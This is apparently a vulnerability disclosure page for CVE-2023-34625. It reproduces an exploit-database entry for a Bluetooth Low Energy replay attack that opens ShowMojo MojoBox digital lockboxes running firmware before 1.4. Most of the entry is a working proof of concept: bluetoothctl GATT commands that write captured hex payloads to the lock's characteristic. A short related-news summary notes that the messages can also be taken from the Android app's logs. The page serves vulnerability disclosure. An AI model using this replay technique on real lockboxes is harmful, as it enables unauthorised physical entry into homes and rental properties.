Headline
MojoBox BLE Replay Attack
ShowMojo MojoBox Digital Lockbox with firmware versions prior to 1.4 are vulnerable to authentication bypass. The implementation of the lock opening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks.
# Exploit Title: MojoBox v1.4 BLE replay attack# Exploit Author: Matteo Mandolini# Date : 15/03/2023# Vendor Homepage: https://hello.showmojo.com/mojobox/# Version: <1.4# CVE: CVE-2023-34625BLE Replay attack ShowMojo MojoBox Digital Lockbox with firmware versione prior to 1.4 is vulnerable to authentication bypass. The implementation of the lockopening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks.PoC:[MojoBox-023516]# gatt.select-attribute ff02[MojoBox-023516:/service000c/char000f]# gatt.notify on[CHG] Attribute /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000f Notifying: yesNotify started[MojoBox-023516:/service000c/char000d]# gatt.write "0x68 0x01 0x18 0x28 0xFC 0x08 0xE5 0xB9 0xDA 0xDB 0xCE 0x21 0x62 0x1B 0x2A 0xF9 0xBE 0xFB 0x1E 0xE9"Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d[MojoBox-023516:/service000c/char000d]# gatt.write "0xA0 0x13 0xEE 0x11 0x94 0x31 0x7D 0xDB 0x16"Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000dRelated news
CVE-2023-34625: Files ≈ Packet Storm
ShowMojo MojoBox Digital Lockbox 1.4 is vulnerable to Authentication Bypass. The implementation of the lock opening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks. A malicious user is able to intercept BLE requests and replicate them to open the lock at any time. Alternatively, an attacker with physical access to the device on which the Android app is installed, can obtain the latest BLE messages via the app logs and use them for opening the lock.